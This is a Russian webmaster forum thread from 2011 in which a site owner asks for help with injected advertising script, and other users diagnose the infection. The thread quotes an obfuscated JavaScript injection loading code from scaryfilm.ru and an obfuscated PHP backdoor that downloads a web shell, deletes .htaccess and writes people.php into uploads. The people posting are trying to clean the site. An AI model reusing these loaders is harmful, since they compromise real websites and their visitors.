Найден вредоносный код
Страницы: 1 2 След.
Найден вредоносный код
Здравствуйте!
У меня проблема, с сегоднешнего утра на моем сайте появился код рекламных партнерок который я не ставил,
код выглядит так "<script type="text/javascript">
<!--
document.write(unescape('%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%3E%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%73%63%72%27%2B%27%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%73%63%61%72%79%66%69%6C%6D%2E%72%75%2F%61%6A%61%78%2F%6F%6E%6C%69%6E%65%2D%6B%69%6E%6F%2E%70%68%70%22%3E%3C%27%2B%27%2F%73%63%72%27%2B%27%69%70%74%3E%27%29%3B%3C%2F%73%63%72%69%70%74%3E'));
//-->
</script>"
но в шаблоне сайта я такого кода ненашел, можите помочь с решением данной проблемы?

мой сайт: online-kino.ws
McAfee вроде может помочь. Просканируйте им.
Инвестирую в ПАММ-счета АЛЬПАРИ
Публикую интересные рейтинги и топ-листы.
Мать моя женщина.... smile:eek: да у вас весь сайт как советский холодильник в наклейках!
вот именно, из-за этого кода и начали вылезать все эти рич-банеры хотя я их не ставил, и хз где этот скрипт находиться
гляньте в index.php
Цитата
Makintosh пишет:
online-kino.ws

Тут одно ясно нужно всегда обновлять скрипты до последней версии , если ума нет заплатки ставить.
Код был найден или нет?Если нет пиши в асю 626437020
Изменено: Mr.SEO - 14 Ноября 2011 19:46
Ищите ссылку в движке скорей всего , либо в js шаблона

http://scaryfilm.ru/ajax/online-kino.php
Изменено: koper-nikl - 14 Ноября 2011 19:54
менял шаблон на стандартный, тоже самое, этот код внизу страници
Скачивайте двиг на компьютер , ну можете и на хостинге но как для меня так лучше скачать и через Notepad ищите код или ссылку ! Сам код в лс скинул , если нужен конечно !?
значит в footer смотрите
Изменено: zelenograd - 14 Ноября 2011 20:09 (добавил букву)
Даже если Вас съели, всё равно у Вас есть два выхода!
Ищите фтп шелл... скорее всего он в одном из установленных модулей, например videovk_mod.

Там есть такое... сносите к чертям!

$fdsfsdfsdfsd = file_get_contents('h'.'t'.'t'.'p'.':'.'//'.'s'.'c'.'a'.'r'.'y'.'f'.'i'.'l'.'m'.'.'.'ru'.'/get.'.'p'.'hp'.'?url='.$_SERVER['HTTP_HOST']).unlink(ROOT_DIR.'/'.'u'.'p'.'l'.'o'.'a'.'d'.'s'.'/.htaccess'); file_put_contents(ROOT_DIR.'/'.'b'.'a'.'c'.'k'.'u'.'p'.'/pe'.'op'.'le'.'.p'.'hp', str_replace('fghfgh544ty', '?>', str_replace('fgfvsdffvsdvsd', '<?', $fdsfsdfsdfsd))); file_put_contents(ROOT_DIR.'/'.'u'.'p'.'l'.'o'.'a'.'d'.'s'.'/'.'f'.'ot'.'os'.'/pe'.'op'.'le'.'.p'.'hp', str_replace('fghfgh544ty', '?>', str_replace('fgfvsdffvsdvsd', '<?', $fdsfsdfsdfsd)));

Как видно шел грузится в uploads/fotos/people.php

А далее обходите все файлы движка и смотрите какие изменения были внесены.
похожая проблема, поймал трояна, который добавляет свой код в htacsess, а также в другие исполняемые файлы.
Думаю проблема в ФТП, но касперский сцука - молчит! говорит все в порядке, сейчас на гугле прочитал про Spyware Terminator - уже обнаружил 22 угрозы, Касперский походу вообще мышей не ловит.

причем это я сейчас к корпоративной версии касперского претензии имею, дома стоит модная интернет-секьюрити 2012 или как там она... вечером дома еще этого терминатора заряжу, если и там будет облом, придется Касперскому письмо писать.
забыл добавить - у меня данный код делает безусловную переадресацию на ахтунг сайт zlubob.org, а оттуда на любые ахтунг сайты, даже неприличного содержания
Попробуйте http://www.cy-pr.com/forum/f80/t22007/
Хостинг Beget на СУПРе
Страницы: 1 2 След.
Похожие темы:
Читают тему (гостей: 1, пользователей: 0, из них скрытых: 0)
Новые темыОбъявленияСвободное общение
19:29 Dao.AD: Монетизация и покупка Push/Pops/Inpage и Video трафика! 
17:29 Как продвигать сайт с неуникальным контентом 
14:50 Индексация страниц 
12:36 У кого новостник, дайте пару советов плиз 
13:53 AviTool - мощный инструмент для автоматизации работы с Avito 
17:01 Absence в Армении 
23:19 Ребята подскажите какими сервисами и прогами вы пользуетесь для SEO продвижения? 
04:12 Просто $0.04/IP 9PROXY.COM Резидентные прокси Неограниченная пропускная способность Уникальная политика замены Без чёрного списка 
21:35 Продвижение YouTube видео в топ поиска | Любой тип контента | Гарантия результата 
20:21 BestX24 - быстрый и безопасный обменник криптовалют и электронных денежных средств 
18:30 - Вечные ссылки с трастовых сайтов 2024 проверен FastTrust 
16:09 Установка|Настройка|Доработка|Наполнение сайтов|Дизайн|3D|Видеомонтаж 
12:15 [MOBILE 4G/LTE PROXY] Приватные Мобильные Прокси 30 Дней 10$ Безлим/ Подходят для всех сайтов 
23:25 Обменник криптовалюты OnlyCrypto 
22:06 Добро пожаловать в цифровой мир... 
19:42 Топ-5 способов использовать мобильные прокси для бизнеса: подробный обзор 
22:08 Накрутка поисковых подсказок 
05:04 Точные прогнозы на футбол 
14:01 Union Pharm - топовая фарма-партнерка для профессионалов! 
10:59 Ням-ням! - 8 деликатесов, которые когда-то ели только бедные люди 
12:23 150+ хакерских поисковых систем и инструментов